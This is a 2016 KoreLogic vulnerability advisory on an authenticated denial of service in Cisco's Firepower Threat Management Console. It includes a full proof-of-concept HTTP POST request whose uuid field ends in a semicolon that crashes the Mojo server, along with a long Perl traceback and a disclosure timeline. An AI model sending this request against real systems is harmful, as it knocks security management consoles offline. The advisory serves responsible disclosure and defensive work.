Cisco Firepower Threat Management Console Authenticated Denial of Service

2016-10-05T00:00:00
ID KL-001-2016-004
Type korelogic
Reporter Matt Bergin (@thatguylevel) of KoreLogic, Inc.
Modified 2016-10-05T00:00:00

Description

Title: Cisco Firepower Threat Management Console Authenticated Denial of Service Advisory ID: KL-001-2016-004 Publication Date: 2016.10.05 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-004.txt

  1. Vulnerability Details

    Affected Vendor: Cisco Affected Product: Firepower Threat Management Console Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213) Platform: Embedded Linux CWE Classification: CWE-404: Improper Resource Shutdown or Release Impact: Denial of Service Attack vector: HTTP

  2. Vulnerability Description

    A authenticated user can send an HTTP request that will crash the Mojo Server thereby making future access impossible until a system reboot is performed.

  3. Technical Description

    The parameter uuid is passed to a chmod function as part of a file path. A ';' in the path causes the function to return an exception.

    POST /pjb.cgi HTTP/1.1 Host: 1.3.3.7 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Content-Type: application/x-www-form-urlencoded Referer: https://1.3.3.7/ddd/ Content-Length: 1180 Cookie: x-auto-507=%7B%22state%22%3A%7B%22offset%22%3A%22i%3A0%22%2C%20%22limit%22%3A%22i%3A20%22%7D%7D; x-auto-467=%7B%22state%22%3A%7B%22offset%22%3A%22i%3A0%22%2C%20%22limit%22%3A%22i%3A20%22%7D%7D; CGISESSID=ab588faec87c38a18347787e3b442ff8 Connection: close

    &function=SF::UI::PJB::Vpn::List::saveVpnDeployment&parameters=%5B%7B%22password%22%3A%22test%22%2C+%22authentication_method%22%3A%22password%22%2C+%22type%22%3A%22PTP%22%2C+%22advanced_setting%22%3A%7B%22ah%22%3A0%2C+%22life_bytes%22%3A%220%22%2C+%22life_time%22%3A1%2C+%22life_time_unit%22%3A%22hours%22%2C+%22life_packets%22%3A%220%22%2C+%22ike_life_time%22%3A3%2C+%22ike_life_time_unit%22%3A%22hours%22%2C+%22ikev2%22%3A1%2C+%22ike_algorithm%22%3A%7B%22other_message_allowed%22%3A0%2C+%22auth_messages%22%3A%5B%7B%22cipher%22%3A%22aes128%22%2C+%22hash%22%3A%22sha1%22%2C+%22dh%22%3A%22modp2048%22%7D%2C%7B%22cipher%22%3A%22aes256%22%2C+%22hash%22%3A%22sha256%22%2C+%22dh%22%3A%22modp2048%22%7D%5D%7D%2C+%22phase2_algorithm%22%3A%7B%22other_message_allowed%22%3A0%2C+%22auth_messages%22%3A%5B%7B%22cipher%22%3A%22aes128%22%2C+%22hash%22%3A%22sha1%22%2C+%22dh%22%3A%22%22%7D%2C%7B%22cipher%22%3A%22aes256%22%2C+%22hash%22%3A%22sha256%22%2C+%22dh%22%3A%22%22%7D%5D%7D%7D%2C+%22status%22%3A0%2C+%22name%22%3A%22test%22%2C+%22uuid%22%3A%2207a0d152-09fc-11e6-93cc-9d074250060f;%22%2C+%22applied%22%3A-1%7D%2C%5B%5D%5D&sf_action_id=a5ba3e29eb18730f7c8dc88d53b48759&ex=1&ss=AllVpnList

    As no exception handler is defined, the process exits.

    Perl traceback:

    The 'file' parameter ("/var/tmp/VPNDeployment-07a0d152-09fc-11e6-93cc-9d074250060f;.lock") to SF::System::chmod did not pass the 'Type Validator (system.file)' callback at /usr/local/sf/lib/perl/5.10.1/SF/System.pm line 73 SF::System::ANON('The \'file\' parameter ("/var/tmp/VPNDeployment-07a0d152-09fc...') called at /usr/local/sf/lib/perl/5.10.1/SF/System.pm line 640 SF::System::chmod('HASH(0x114c3c88)') called at /usr/local/sf/lib/perl/5.10.1/SF/Util.pm line 619 SF::Util::wait_for_lock('/var/tmp/VPNDeployment-07a0d152-09fc-11e6-93cc-9d074250060f;....', 120) called at /usr/local/sf/lib/perl/5.10.1/SF/EODataHandler/VPNDeployment.pm line 206 SF::EODataHandler::VPNDeployment::get_lock('07a0d152-09fc-11e6-93cc-9d074250060f;') called at /usr/local/sf/lib/perl/5.10.1/SF/UI/PJB/Vpn/List.pm line 540 SF::UI::PJB::Vpn::List::saveVpnDeployment('HASH(0x1154bf38)', 'ARRAY(0x11513750)') called at /usr/local/sf/lib/perl/5.10.1/SF/UI/PJB.pm line 859 SF::UI::PJB::executeFunction('SF::UI::PJB::Vpn::List::saveVpnDeployment', 'ARRAY(0x11513720)') called at /usr/local/sf/lib/perl/5.10.1/SF/UI/PJB.pm line 821 SF::UI::PJB::handleRequest('SF::UI::PJB::Vpn::List::saveVpnDeployment', '[{"password":"test", "authentication_method":"password", "typ...') called at /usr/local/sf/lib/perl/5.10.1/SF/Mojo/Handlers/PjbHandler.pm line 39 eval {...} called at /usr/local/sf/lib/perl/5.10.1/SF/Mojo/Handlers/PjbHandler.pm line 42 SF::Mojo::Handlers::PjbHandler::handle_pjb_cgi('SF::Mojo::Handlers::PjbHandler=HASH(0x1152d7a0)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 126 Mojolicious::ANON(undef, 'SF::Mojo::Handlers::PjbHandler=HASH(0x1152d7a0)', 'CODE(0xd635740)', 1) called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 20 Mojolicious::Plugins::ANON() called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 23 Mojolicious::Plugins::emit_chain('Mojolicious::Plugins=HASH(0x9056318)', 'around_action', 'SF::Mojo::Handlers::PjbHandler=HASH(0x1152d7a0)', 'CODE(0xd635740)', 1) called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Routes.pm line 106 Mojolicious::Routes::_action('SF::Mojo=HASH(0x905ed38)', 'SF::Mojo::Handlers::PjbHandler=HASH(0x1152d7a0)', 'CODE(0xd635740)', 1) called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Routes.pm line 191 Mojolicious::Routes::_controller('Mojolicious::Routes=HASH(0x905f208)', 'Mojolicious::Controller=HASH(0x1064dbf8)', 'HASH(0x10026868)', 1) called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Routes.pm line 43 Mojolicious::Routes::continue('Mojolicious::Routes=HASH(0x905f208)', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Routes.pm line 51 Mojolicious::Routes::dispatch('Mojolicious::Routes=HASH(0x905f208)', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 118 Mojolicious::dispatch('SF::Mojo=HASH(0x905ed38)', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 127 Mojolicious::ANON(undef, 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 20 Mojolicious::Plugins::ANON() called at /usr/local/sf/lib/perl/5.10.1/SF/Mojo.pm line 217 eval {...} called at /usr/local/sf/lib/perl/5.10.1/SF/Mojo.pm line 217 SF::Mojo::ANON('CODE(0x1152fe98)', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 20 Mojolicious::Plugins::ANON() called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 199 eval {...} called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 199 Mojolicious::_exception('CODE(0xf58a1098)', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 20 Mojolicious::Plugins::ANON() called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious/Plugins.pm line 23 Mojolicious::Plugins::emit_chain('Mojolicious::Plugins=HASH(0x9056318)', 'around_dispatch', 'Mojolicious::Controller=HASH(0x1064dbf8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojolicious.pm line 133 Mojolicious::handler('SF::Mojo=HASH(0x905ed38)', 'Mojo::Transaction::HTTP=HASH(0x114f6558)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server.pm line 71 Mojo::Server::ANON('Mojo::Server::Prefork=HASH(0x8349e58)', 'Mojo::Transaction::HTTP=HASH(0x114f6558)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/EventEmitter.pm line 15 Mojo::EventEmitter::emit('Mojo::Server::Prefork=HASH(0x8349e58)', 'request', 'Mojo::Transaction::HTTP=HASH(0x114f6558)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Daemon.pm line 83 Mojo::Server::Daemon::ANON('Mojo::Transaction::HTTP=HASH(0x114f6558)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/EventEmitter.pm line 15 Mojo::EventEmitter::emit('Mojo::Transaction::HTTP=HASH(0x114f6558)', 'request') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Transaction/HTTP.pm line 65 Mojo::Transaction::HTTP::server_read('Mojo::Transaction::HTTP=HASH(0x114f6558)', 'POST /pjb.cgi HTTP/1.1\x{d}\x{a}Host: 1.3.3.7\x{d}\x{a}User-Agent: Mozil...') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Daemon.pm line 186 Mojo::Server::Daemon::_read('Mojo::Server::Prefork=HASH(0x8349e58)', 'b2bd7252c6d676b510adb8ba94b9f73f', 'POST /pjb.cgi HTTP/1.1\x{d}\x{a}Host: 1.3.3.7\x{d}\x{a}User-Agent: Mozil...') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Daemon.pm line 166 Mojo::Server::Daemon::ANON('Mojo::IOLoop::Stream=HASH(0x103a7e40)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/EventEmitter.pm line 33 eval {...} called at /usr/lib/perl5/site_perl/5.10.1/Mojo/EventEmitter.pm line 33 Mojo::EventEmitter::emit_safe('Mojo::IOLoop::Stream=HASH(0x103a7e40)', 'read', 'POST /pjb.cgi HTTP/1.1\x{d}\x{a}Host: 1.3.3.7\x{d}\x{a}User-Agent: Mozil...') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/IOLoop/Stream.pm line 116 Mojo::IOLoop::Stream::_read('Mojo::IOLoop::Stream=HASH(0x103a7e40)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/IOLoop/Stream.pm line 53 Mojo::IOLoop::Stream::ANON('Mojo::Reactor::EV=HASH(0x88c8ca8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/Poll.pm line 115 eval {...} called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/Poll.pm line 115 Mojo::Reactor::Poll::_sandbox('Mojo::Reactor::EV=HASH(0x88c8ca8)', 'Read', 'CODE(0x1152e100)', 0) called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/EV.pm line 52 Mojo::Reactor::EV::_io('Mojo::Reactor::EV=HASH(0x88c8ca8)', 77, 'EV::IO=SCALAR(0x10667cc8)', 3) called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/EV.pm line 43 Mojo::Reactor::EV::ANON('EV::IO=SCALAR(0x10667cc8)', 3) called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/EV.pm line 24 eval {...} called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Reactor/EV.pm line 24 Mojo::Reactor::EV::start('Mojo::Reactor::EV=HASH(0x88c8ca8)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/IOLoop.pm line 130 Mojo::IOLoop::start('Mojo::IOLoop=HASH(0x88c8a58)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Prefork.pm line 214 Mojo::Server::Prefork::_spawn('Mojo::Server::Prefork=HASH(0x8349e58)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Prefork.pm line 122 Mojo::Server::Prefork::_manage('Mojo::Server::Prefork=HASH(0x8349e58)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Prefork.pm line 96 Mojo::Server::Prefork::run('Mojo::Server::Prefork=HASH(0x8349e58)') called at /usr/lib/perl5/site_perl/5.10.1/Mojo/Server/Hypnotoad.pm line 77 Mojo::Server::Hypnotoad::run('Mojo::Server::Hypnotoad=HASH(0x8953e50)', '/var/sf/bin/mojo_server.pl') called

  4. Mitigation and Remediation Recommendation

    The vendor has addressed this vulnerability in their Support Center as Bug ID CSCva30631. Vendor acknowledgement available at: https://tools.cisco.com/bugsearch/

  5. Credit

    This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

  6. Disclosure Timeline

    2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco. 2016.06.30 - Cisco acknowledges receipt of vulnerability report. 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for this vulnerability and for 3 others reported in the same product. 2016.08.12 - 30 business days have elapsed since the vulnerability was reported to Cisco. 2016.09.02 - 45 business days have elapsed since the vulnerability was reported to Cisco. 2016.09.09 - KoreLogic asks for an update on the status of the remediation efforts. 2016.09.15 - Cisco confirms remediation is underway and soon to be completed. 2016.09.28 - Cisco informs KoreLogic that the remediation details will be released publicly on 2016.10.05. 2016.10.05 - Public disclosure.

  7. Proof of Concept

    See Technical Description